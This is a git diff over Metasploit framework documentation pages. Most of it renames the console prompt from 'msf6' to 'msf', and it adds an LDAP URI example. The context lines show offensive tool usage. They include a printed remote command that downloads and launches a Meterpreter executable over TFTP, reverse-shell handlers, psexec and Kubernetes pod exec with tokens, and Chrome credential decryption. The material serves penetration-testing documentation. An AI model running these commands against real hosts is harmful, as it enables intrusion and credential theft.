+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
 [*] exec: netstat -an | grep 8080

 udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
 udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4
 FETCH_URIPATH => test4
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547
 LPORT => 8547
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler

 [*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe
 [*] Payload Handler Started as Job 5

 [*] starting tftpserver on 10.5.135.201:8080
 [*] Started reverse TCP handler on 10.5.135.201:8547 
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
 [*] exec: netstat -an | grep 8080

 udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
@@ -7,7 +7,7 @@
 There are two methods of adding a module to the favorites list. The first way is via simply calling `favorite` when there is an active module:

 ```shell
-msf6 exploit(multi/handler) > favorite
+msf exploit(multi/handler) > favorite
 [+] Added exploit/multi/handler to the favorite modules file
 ```

@@ -15,7 +15,7 @@ msf6 exploit(multi/handler) > favorite
 Using the active module without an active module will print the `favorite` command help output:

 ```shell
-msf6 > favorite
+msf > favorite
 [-] No module has been provided to favorite.
 Usage: favorite [mod1 mod2 ...]

@@ -35,10 +35,10 @@ OPTIONS:
 The second method of adding favorites allows adding multiple modules at once:

 ```msf
-msf6 > favorite exploit/multi/handler exploit/windows/smb/psexec
+msf > favorite exploit/multi/handler exploit/windows/smb/psexec
 [+] Added exploit/multi/handler to the favorite modules file
 [+] Added exploit/windows/smb/psexec to the favorite modules file
-msf6 > show favorites
+msf > show favorites

 Favorites
 =========
@@ -59,14 +59,14 @@ Modules can be deleted from the favorites list individually or by clearing the c
 #### Deleting an active module from favorites list

 ```shell
-msf6 exploit(multi/handler) > favorite -d
+msf exploit(multi/handler) > favorite -d
 [*] Removing exploit/multi/handler from the favorite modules file
 ```

 #### Specifying module(s) to delete

 ```shell
-msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec
+msf > favorite -d exploit/multi/handler exploit/windows/smb/psexec
 [*] Removing exploit/multi/handler from the favorite modules file
 [*] Removing exploit/windows/smb/psexec from the favorite modules file
 ```
@@ -74,7 +74,7 @@ msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec
 #### Clearing the favorites list

 ```msf
-msf6 > show favorites
+msf > show favorites

 Favorites
 =========
@@ -84,9 +84,9 @@ Favorites
   0  exploit/multi/handler                        manual  No     Generic Payload Handler
   1  exploit/windows/smb/psexec  1999-01-01       manual  No     Microsoft Windows Authenticated User Code Execution

-msf6 > favorite -c
+msf > favorite -c
 [+] Favorite modules file cleared
-msf6 > show favorites
+msf > show favorites
 [!] The favorite modules file is empty
 ```

@@ -95,7 +95,7 @@ msf6 > show favorites
 The list of favorite modules can be printed by supplying the `-l` flag. This is an alias for the `show favorites` and `favorites` commands.

 ```shell
-msf6 > favorite -l
+msf > favorite -l

 Favorites
 =========
@@ -104,4 +104,4 @@ Favorites
   -  ----                        ---------------  ----    -----  -----------
   0  exploit/multi/handler                        manual  No     Generic Payload Handler
   1  exploit/windows/smb/psexec  1999-01-01       manual  No     Microsoft Windows Authenticated User Code Execution
-```
+```
@@ -352,19 +352,19 @@ end
 The module will start the http server and print the repo to clone

 ```msf
-msf6 > use exploit/multi/http/git_clone_test
+msf > use exploit/multi/http/git_clone_test
 [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
-msf6 exploit(multi/http/git_clone_test) > set srvport 9999
+msf exploit(multi/http/git_clone_test) > set srvport 9999
 srvport => 9999
-msf6 exploit(multi/http/git_clone_test) > set lhost 192.168.140.1
+msf exploit(multi/http/git_clone_test) > set lhost 192.168.140.1
 lhost => 192.168.140.1
-msf6 exploit(multi/http/git_clone_test) > set srvhost 192.168.140.1
+msf exploit(multi/http/git_clone_test) > set srvhost 192.168.140.1
 srvhost => 192.168.140.1
-msf6 exploit(multi/http/git_clone_test) > run
+msf exploit(multi/http/git_clone_test) > run
 [*] Exploit running as background job 0.
 [*] Exploit completed, but no session was created.

-msf6 exploit(multi/http/git_clone_test) > [*] Started reverse TCP handler on 192.168.140.1:4444 
+msf exploit(multi/http/git_clone_test) > [*] Started reverse TCP handler on 192.168.140.1:4444 
 [*] Using URL: http://192.168.140.1:9999/MOYuJfC
 [*] Server started.
 [*] Git repository to clone: http://192.168.140.1:9999/y-find.git
@@ -6,7 +6,7 @@ The term 'repo' is short for 'Repository.' Also known as 'fork' (as a noun).

 ## The Easy Way

-The easiest way to keep in sync with master is to trash your fork of `metasploit-framework`, and re-fork. This is a surprisingly common practice, since most people in the world don't work with Metasploit every day. If you're the sort to be struck by hackerish inspiration every few months, and couldn't give a whit about preserving branches, history, or pull requests, simply nuke your local fork.
+The easiest way to keep in sync with master is to trash your fork of `metasploit-framework`, and re-fork. This is a surprisingly common practice, since most people in the world don't work with Metasploit every day. If you're the sort to be struck by hackerish inspiration every few months, and couldn't give a with about preserving branches, history, or pull requests, simply nuke your local fork.

 On your fork, in the GitHub UI, go to **Settings**, scroll down to the **Danger Zone**, and hit **Delete this repository**. Once you've re-authenticated, re-fork the `metasploit-framework` repository by going to the [Rapid7 repo](https://github.com/rapid7/metasploit-framework) and hit **Fork** as hard as you possibly can.

@@ -5,18 +5,18 @@ and should not be used during normal operations. These modules also as part of t
 By default the test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:

 ```msf
-msf6 > loadpath test/modules
+msf > loadpath test/modules
 Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
-msf6 > 
+msf > 
 ```

 The modules can be searched for:

 ```msf
-msf6 > search post/test
+msf > search post/test

 Matching Modules
 ================
@@ -35,8 +35,8 @@ Matching Modules
 Example of running the test module against an opened session:

 ```
-msf6 > use post/test/cmd_exec
-msf6 post(test/cmd_exec) > run session=-1
+msf > use post/test/cmd_exec
+msf post(test/cmd_exec) > run session=-1
 ...
 [*] Testing complete in 2.04 seconds
 [*] Passed: 6; Failed: 0; Skipped: 0
@@ -47,7 +47,7 @@ The `post/test/all` module is an aggregate module that can be used to quickly ru
 against a currently open session:

 ```msf
-msf6 post(test/all) > run session=-1
+msf post(test/all) > run session=-1

 [*] Applicable modules:
 Valid modules for x86/windows session 1
@@ -7,7 +7,7 @@ When you have a number of sessions open, searching can be a useful tool to navig
 You can get a list of sessions matching a specific criteria within msfconsole:

 ```msf
-msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_id:2"
+msf payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_id:2"
 Active sessions
 ===============

@@ -20,7 +20,7 @@ Active sessions
 Currently, the only supported keywords for search are `session_id`, `session_type`, and `last_checkin`. These keywords can be combined to further filter your results, and used with other flags. For example:

 ```msf
-msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_type:meterpreter last_checkin:greater_than:10s last_checkin:less_than:10d5h2m30s" -v
+msf payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_type:meterpreter last_checkin:greater_than:10s last_checkin:less_than:10d5h2m30s" -v

 Active sessions
 ===============
@@ -45,7 +45,7 @@ Of note in the above example, `last_checkin` requires an extra argument. The sec
 If `--search` is used in conjunction with `--kill-all`, it will restrict the latter function to only the search results. For example:

 ```msf
-msf6 payload(windows/meterpreter/reverse_http) > sessions -K -S "session_type:meterpreter"
+msf payload(windows/meterpreter/reverse_http) > sessions -K -S "session_type:meterpreter"
 [*] Killing matching sessions...

 Active sessions
@@ -58,5 +58,5 @@ Active sessions

 [*] 192.168.2.132 - Meterpreter session 1 closed.
 [*] 192.168.2.132 - Meterpreter session 2 closed.
-msf6 payload(windows/meterpreter/reverse_http) >
+msf payload(windows/meterpreter/reverse_http) >
 ```
@@ -30,7 +30,7 @@ In both scenarios, reports will be generated and written to disk that can be ope
 The `time` command in msfconsole can be used to record the performance of a command:

 ```msf
-msf6 exploit(windows/smb/ms17_010_psexec) > time reload
+msf exploit(windows/smb/ms17_010_psexec) > time reload
 [*] Reloading module...
 [+] Command "reload" completed in 0.20876399998087436 seconds
 ```
@@ -38,7 +38,7 @@ msf6 exploit(windows/smb/ms17_010_psexec) > time reload
 It is possible to record CPU and memory usage with the `--memory` and `--cpu` flags:

 ```msf
-msf6 exploit(windows/smb/ms17_010_psexec) > time --cpu search smb
+msf exploit(windows/smb/ms17_010_psexec) > time --cpu search smb
 ... etc ...
 Generating CPU dump /var/folders/wp/fp12h8q13kq7mvf4mll72c140000gq/T/msf-profile-2023030711505620230307-77101-4josw1/cpu
 [+] Command "search smb" completed in 0.4150249999947846 seconds
@@ -42,7 +42,7 @@ Creating initial database schema
 This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.  If you start up msfconsole now it should automatically connect to the database, and if you run `db_status` you should see something like this:

 ```
-msf6 > db_status
+msf > db_status
 [*] Connected to msf. Connection type: postgresql.
 ```

@@ -11,7 +11,7 @@ Note that any port can be used to run an application which communicates via HTTP
 This document is generic advice for running and debugging HTTP based Metasploit modules, but it is best to use a Metasploit module which is specific to the application that you are pentesting. For instance:

 ```msf
-msf6 > search tomcat http
+msf > search tomcat http
 ```

 ### HTTP Examples
@@ -49,12 +49,12 @@ run http://example.com HttpTrace=true verbose=true
 For instance:

 ```msf
-msf6 > use scanner/http/title
-msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
+msf > use scanner/http/title
+msf auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
-msf6 auxiliary(scanner/http/title) > set HttpTrace true
+msf auxiliary(scanner/http/title) > set HttpTrace true
 HttpTrace => true
-msf6 auxiliary(scanner/http/title) > run
+msf auxiliary(scanner/http/title) > run

 ####################
 # Request:
@@ -89,7 +89,7 @@ Content-Length: 178
 [+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for /
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/http/title) >
+msf auxiliary(scanner/http/title) >
 ```

 To send all HTTP requests through a proxy, i.e. through Burp Suite:
@@ -170,13 +170,13 @@ Header-Name-Here: <%= 'content of header goes here' %>

 The following output shows leveraging the scraper scanner module with an additional header stored in ```additional_headers.txt```.
 ```msf
-msf6 auxiliary(scanner/http/scraper) > cat additional_headers.txt
+msf auxiliary(scanner/http/scraper) > cat additional_headers.txt
 [*] exec: cat additional_headers.txt

 X-Cookie-Header: <%= 'example-cookie' %>
-msf6 auxiliary(scanner/http/scraper) > set HTTPRAWHEADERS additional_headers.txt
+msf auxiliary(scanner/http/scraper) > set HTTPRAWHEADERS additional_headers.txt
 HTTPRAWHEADERS => additional_headers.txt
-msf6 auxiliary(scanner/http/scraper) > exploit
+msf auxiliary(scanner/http/scraper) > exploit

 ####################
 # Request:
@@ -9,7 +9,7 @@ a compromised docker container, or external to the cluster if the required APIs
 In the future there may be more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search kubernetes
+msf > search kubernetes
 ```

 ### Lab Environment
@@ -41,12 +41,12 @@ run session=-1
 If the Kubernetes API is publicly accessible and you have a JWT Token:

 ```msf
-msf6 > use cloud/kubernetes/enum_kubernetes
-msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
+msf > use cloud/kubernetes/enum_kubernetes
+msf auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
 RHOST => https://kubernetes.docker.internal:6443
-msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciO...
+msf auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciO...
 TOKEN => eyJhbGciO...
-msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run
+msf auxiliary(cloud/kubernetes/enum_kubernetes) > run
 [*] Running module against 127.0.0.1

 [+] Kubernetes service version: {"major":"1","minor":"21","gitVersion":"v1.21.2","gitCommit":"092fbfbf53427de67cac1e9fa54aaa09a28371d7","gitTreeState":"clean","buildDate":"2021-06-16T12:53:14Z","goVersion":"go1.16.5","compiler":"gc","platform":"linux/amd64"}
@@ -68,7 +68,7 @@ Namespaces
 By default the `run` command will enumerate all resources available, but you can also specify which actions you would like to perform:

 ```msf
-msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions
+msf auxiliary(cloud/kubernetes/enum_kubernetes) > show actions

 Auxiliary actions:

@@ -115,9 +115,9 @@ If you have a Meterpreter session on a compromised Kubernetes container with the
 will be gathered from the session host automatically. The `TOKEN` will be read from the mounted `/run/secrets/kubernetes.io/serviceaccount/token` file if available:

 ```msf
-msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
+msf exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
 TARGET => Interactive WebSocket
-msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
+msf exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1

 [*] Routing traffic through session: 1
 [+] Kubernetes service host: 10.96.0.1:443
@@ -137,19 +137,19 @@ pwd
 If the Kubernetes API is available remotely, the RHOST values and token can be set manually. In this scenario a token is manually specified, to execute a Python Meterpreter payload within the `thinkphp-67f7c88cc9-tgpfh` pod:

 ```msf
-msf6 > use exploit/multi/kubernetes/exec
+msf > use exploit/multi/kubernetes/exec
 [*] Using configured payload python/meterpreter/reverse_tcp
-msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
+msf exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
 TOKEN => eyJhbGciOiJSUzI1...
-msf6 exploit(multi/kubernetes/exec) > set POD thinkphp-67f7c88cc9-tgpfh
+msf exploit(multi/kubernetes/exec) > set POD thinkphp-67f7c88cc9-tgpfh
 POD => thinkphp-67f7c88cc9-tgpfh
-msf6 exploit(multi/kubernetes/exec) > set RHOSTS 192.168.159.31
+msf exploit(multi/kubernetes/exec) > set RHOSTS 192.168.159.31
 RHOSTS => 192.168.159.31
-msf6 exploit(multi/kubernetes/exec) > set TARGET Python
+msf exploit(multi/kubernetes/exec) > set TARGET Python
 TARGET => Python
-msf6 exploit(multi/kubernetes/exec) > set PAYLOAD python/meterpreter/reverse_tcp
+msf exploit(multi/kubernetes/exec) > set PAYLOAD python/meterpreter/reverse_tcp
 PAYLOAD => python/meterpreter/reverse_tcp
-msf6 exploit(multi/kubernetes/exec) > run
+msf exploit(multi/kubernetes/exec) > run

 [*] Started reverse TCP handler on 192.168.159.128:4444
 [*] Sending stage (39736 bytes) to 192.168.159.31
@@ -164,5 +164,5 @@ Architecture : x64
 Meterpreter  : python/linux
 meterpreter > background
 [*] Backgrounding session 1...
-msf6 exploit(multi/kubernetes/exec) >
+msf exploit(multi/kubernetes/exec) >
 ```
@@ -34,10 +34,17 @@ use auxiliary/gather/ldap_query
 run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
 ```

+Alternatively, the URI syntax can be used:
+
+```
+use auxiliary/gather/ldap_query
+run ldap://domain.local;Administrator:p4$$w0rd@192.168.123.13/dc=domain,dc=local action=ENUM_ACCOUNTS
+```
+
 Example output:

 ```msf
-msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
+msf auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
 [*] Running module against 192.168.123.13

 [*] Discovering base DN automatically
@@ -105,8 +112,8 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 Query LDAP for accounts:

 ```msf
-msf6 > use auxiliary/gather/ldap_query
-msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
+msf > use auxiliary/gather/ldap_query
+msf auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
 [*] Running module against 192.168.123.13

 [+] 192.168.123.13:88 - Received a valid TGT-Response
@@ -11,13 +11,13 @@ MSSQL is frequently found on port on the following ports:
 For a full list of MSSQL modules run the `search` command within msfconsole:

 ```msf
-msf6 > search mssql
+msf > search mssql
 ```

 Or to search for modules that work with a specific session type:

 ```msf
-msf6 > search session_type:mssql
+msf > search session_type:mssql
 ```

 ### Lab Environment
@@ -61,7 +61,7 @@ on a successful login:
 Which you can interact with using `sessions -i <session id>` or `sessions -i -1` to interact with the most recently opened session.

 ```msf
-msf6 auxiliary(scanner/mssql/mssql_login) > sessions
+msf auxiliary(scanner/mssql/mssql_login) > sessions

 Active sessions
 ===============
@@ -70,7 +70,7 @@ Active sessions
  --  ----  ----   -----------                      ----------
  1         mssql  MSSQL test @ 192.168.2.242:1433  192.168.2.1:60963 -> 192.168.23.242:1433 (192.168.2.242)

-msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
+msf auxiliary(scanner/mssql/mssql_login) > sessions -i 1
 [*] Starting interaction with 1...

 mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
@@ -146,7 +146,7 @@ This session also works with the following modules:
 To interact directly with the session as if in a SQL prompt, you can use the `query` command.

 ```msf
-msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i -1
+msf auxiliary(scanner/mssql/mssql_login) > sessions -i -1
 [*] Starting interaction with 2...

 mssql @ 192.168.2.242:1433 (master) > query -h
@@ -224,8 +224,8 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 Connect to a Microsoft SQL Server instance and run a query:

 ```msf
-msf6 > use auxiliary/admin/mssql/mssql_sql
-msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+msf > use auxiliary/admin/mssql/mssql_sql
+msf auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
 [*] Reloading module...
 [*] Running module against 192.168.123.13

@@ -14,13 +14,13 @@ Metasploit has support for multiple MySQL modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search mysql
+msf > search mysql
 ```

 Or to search for modules that work with a specific session type:

 ```msf
-msf6 > search session_type:mysql
+msf > search session_type:mysql
 ```

 ### Lab Environment
@@ -49,7 +49,7 @@ use auxiliary/scanner/mysql/mysql_login
 run 'mysql://root: a b c p4$$w0rd@127.0.0.1'
 ```

-Re-using MySQL credentials in a subnet:
+Reusing MySQL credentials in a subnet:

 ```
 use auxiliary/scanner/mysql/mysql_login
@@ -92,15 +92,15 @@ for the MySQL client you're connecting to. The run command with CreateSession
 set to true should give you an interactive session:

 ```msf
-msf6 > use scanner/mysql/mysql_login 
-msf6 auxiliary(scanner/mysql/mysql_login) > run rhost=127.0.0.1 rport=4306 username=root password=password createsession=true
+msf > use scanner/mysql/mysql_login 
+msf auxiliary(scanner/mysql/mysql_login) > run rhost=127.0.0.1 rport=4306 username=root password=password createsession=true

 [+] 127.0.0.1:4306        - 127.0.0.1:4306 - Found remote MySQL version 11.2.2
 [+] 127.0.0.1:4306        - 127.0.0.1:4306 - Success: 'root:password'
 [*] MySQL session 1 opened (127.0.0.1:53241 -> 127.0.0.1:4306) at 2024-03-12 12:40:46 -0500
 [*] 127.0.0.1:4306        - Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/mysql/mysql_login) > sessions -i -1
+msf auxiliary(scanner/mysql/mysql_login) > sessions -i -1
 [*] Starting interaction with 1...

 mysql @ 127.0.0.1:4306 >
@@ -110,7 +110,7 @@ You can interact with your new session using `sessions -i -1` or `sessions <sess
 You can also use `help` to get more information about how to use your session.

 ```msf
-msf6 auxiliary(scanner/mysql/mysql_login) > sessions
+msf auxiliary(scanner/mysql/mysql_login) > sessions

 Active sessions
 ===============
@@ -120,7 +120,7 @@ Active sessions
  2         mssql  MSSQL test @ 192.168.2.242:1433  192.168.2.1:61428 -> 192.168.2.242:1433 (192.168.2.242)
  3         mysql  MySQL root @ 127.0.0.1:4306      127.0.0.1:61450 -> 127.0.0.1:4306 (127.0.0.1)

-msf6 auxiliary(scanner/mysql/mysql_login) > sessions -i 3
+msf auxiliary(scanner/mysql/mysql_login) > sessions -i 3
 [*] Starting interaction with 3...
 ```

@@ -7,7 +7,7 @@ Metasploit post modules replace old Meterpreter scripts, which are no longer mai
 You can search for post gather modules within msfconsole:

 ```msf
-msf6 > search type:post platform:windows name:gather
+msf > search type:post platform:windows name:gather

 Matching Modules
 ================
@@ -26,8 +26,8 @@ There are two ways to launch a Post module, both require an existing session.
 Within a msf prompt you can use the `use` command followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:

 ```msf
-msf6 > use post/windows/gather/enum_chrome
-msf6 post(windows/gather/enum_chrome) > run session=-1 verbose=true
+msf > use post/windows/gather/enum_chrome
+msf post(windows/gather/enum_chrome) > run session=-1 verbose=true

 [*] Impersonating token: 7192
 [*] Running as user 'DESKTOP-N3MAG5R\basic_user'...
@@ -44,13 +44,13 @@ msf6 post(windows/gather/enum_chrome) > run session=-1 verbose=true
 [+] Decrypted data: url:https://www.example.com/ my_username:my_password_123
 [+] Decrypted data saved in: /Users/user/.msf4/loot/20220422122129_default_192.168.123.151_chrome.decrypted_981698.txt
 [*] Post module execution completed
-msf6 post(windows/gather/enum_chrome) >
+msf post(windows/gather/enum_chrome) >
 ```

 Or within a Meterpreter prompt use the `run` command, which will automatically set the module's session value:

 ```msf
-msf6 > sessions --interact -1
+msf > sessions --interact -1
 [*] Starting interaction with 5...

 meterpreter > run post/windows/gather/enum_applications
@@ -14,13 +14,13 @@ Metasploit has support for multiple PostgreSQL modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search postgres
+msf > search postgres
 ```

 Or to search for modules that work with a specific session type:

 ```msf
-msf6 > search session_type:postgres
+msf > search session_type:postgres
 ```


@@ -51,7 +51,7 @@ use auxiliary/scanner/postgres/postgres_login
 run 'postgres://root: a b c p4$$w0rd@127.0.0.1'
 ```

-Re-using PostgreSQL credentials in a subnet:
+Reusing PostgreSQL credentials in a subnet:

 ```
 use auxiliary/scanner/postgres/postgres_login
@@ -95,7 +95,7 @@ set to true should give you an interactive session.
 For example:

 ```msf
-msf6 auxiliary(scanner/postgres/postgres_login) > run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true
+msf auxiliary(scanner/postgres/postgres_login) > run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true
 ```

 Should yield:
@@ -111,7 +111,7 @@ You can interact with your session using `sessions -i -1` or `sessions <session
 Use the help command for more info.

 ```msf
-msf6 auxiliary(scanner/postgres/postgres_login) > sessions
+msf auxiliary(scanner/postgres/postgres_login) > sessions

 Active sessions
 ===============
@@ -120,7 +120,7 @@ Active sessions
  --  ----  ----        -----------                           ----------
  1         postgresql  PostgreSQL postgres @ 127.0.0.1:5432  127.0.0.1:61324 -> 127.0.0.1:5432 (127.0.0.1)

-msf6 auxiliary(scanner/postgres/postgres_login) > sessions -i 1
+msf auxiliary(scanner/postgres/postgres_login) > sessions -i 1
 [*] Starting interaction with 1...
 ```

@@ -257,7 +257,7 @@ psql postgres://postgres:mysecretpassword@localhost:5432
 Metasploit's output will be:

 ```msf
-msf6 auxiliary(server/capture/postgresql) >
+msf auxiliary(server/capture/postgresql) >
 [*] Started service listener on 0.0.0.0:5432
 [*] Server started.
 [+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
@@ -24,13 +24,13 @@ Metasploit has support for multiple SMB modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search smb
+msf > search smb
 ```

 Or to search for modules that work with a specific session type:

 ```msf
-msf6 > search session_type:smb
+msf > search session_type:smb
 ```

 ### Lab Environment
@@ -75,7 +75,7 @@ When using the smb_login module, the CreateSession option can be used to obtain
 session within the smb instance. Running with the following options:

 ```msf
-msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
+msf auxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
 ```

 Should give you output similar to 
@@ -86,14 +86,14 @@ Should give you output similar to
 [*] SMB session 1 opened (172.16.158.1:62793 -> 172.14.2.164:445) at 2024-03-12 17:03:09 +0000
 [*] 172.14.2.164:445    - Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
+msf auxiliary(scanner/smb/smb_login) > sessions -i -1
 [*] Starting interaction with 1...
 ```

 Which you can interact with using `sessions -i <session id>` or `sessions -i -1` to interact with the most recently opened session.

 ```msf
-msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
+msf auxiliary(scanner/smb/smb_login) > sessions -i -1
 [*] Starting interaction with 1...

 SMB (172.14.2.164) > shares
@@ -315,8 +315,8 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 Running psexec against a host:

 ```msf
-msf6 > use exploit/windows/smb/psexec
-msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
+msf > use exploit/windows/smb/psexec
+msf exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local

 [*] Started reverse TCP handler on 192.168.123.1:4444
 [*] 192.168.123.13:445 - Connecting to the server...
@@ -12,7 +12,7 @@ Metasploit has support for multiple SSH modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search ssh
+msf > search ssh
 ```

 ### Lab Environment
@@ -61,8 +61,8 @@ docker run --rm -it --publish 127.0.0.1:2222:22 ssh_lab:latest
 It should now be possible to test the SSH login from msfconsole:

 ```msf
-msf6 > use scanner/ssh/ssh_login
-msf6 auxiliary(scanner/ssh/ssh_login) > run ssh://test_user:password123@127.0.0.1:2222
+msf > use scanner/ssh/ssh_login
+msf auxiliary(scanner/ssh/ssh_login) > run ssh://test_user:password123@127.0.0.1:2222

 [*] 127.0.0.1:2222 - Starting bruteforce
 [+] 127.0.0.1:2222 - Success: 'test_user:password123' 'uid=700(test_user) gid=700(test_user) groups=700(test_user),700(test_user) Linux 5a26fe63abef 5.10.25-linuxkit #1 SMP Tue Mar 23 09:27:39 UTC 2021 x86_64 Linux '
@@ -115,7 +115,7 @@ use scanner/ssh/ssh_login
 run ssh://user:pass@172.18.102.20
 ```

-Re-using SSH credentials in a subnet:
+Reusing SSH credentials in a subnet:

 ```
 use scanner/ssh/ssh_login
@@ -3,7 +3,7 @@
 Each Metasploit module has a set of options which must be set before running. These can be seen with the `show options` or `options` command:

 ```msf
-msf6 exploit(windows/smb/ms17_010_eternalblue) > options
+msf exploit(windows/smb/ms17_010_eternalblue) > options

 Module options (exploit/windows/smb/ms17_010_eternalblue):

@@ -36,7 +36,7 @@ Exploit target:
 Each Metasploit module also has _advanced_ options, which can often be useful for fine-tuning modules, in particular setting connection timeouts values can be useful:

 ```msf
-msf6 exploit(windows/smb/ms17_010_eternalblue) > advanced
+msf exploit(windows/smb/ms17_010_eternalblue) > advanced

 Module advanced options (exploit/windows/smb/ms17_010_eternalblue):

@@ -61,7 +61,7 @@ Payload advanced options (windows/x64/meterpreter/reverse_tcp):
 You can see which options stilloptions to be set with the `show missing` command:

 ```msf
-msf6 exploit(windows/smb/ms17_010_eternalblue) > show missing
+msf exploit(windows/smb/ms17_010_eternalblue) > show missing

 Module options (exploit/windows/smb/ms17_010_eternalblue):

@@ -124,6 +124,8 @@ The following protocols are currently supported, and described in more detail be
 - file - Load a series of RHOST values separated by newlines from a file. This file can also include URI strings
 - http
 - https
+- ldap
+- ldaps
 - mysql
 - postgres
 - smb
@@ -41,7 +41,7 @@ Metasploit has support for multiple WinRM modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search winrm
+msf > search winrm
 ```

 ### Lab Environment
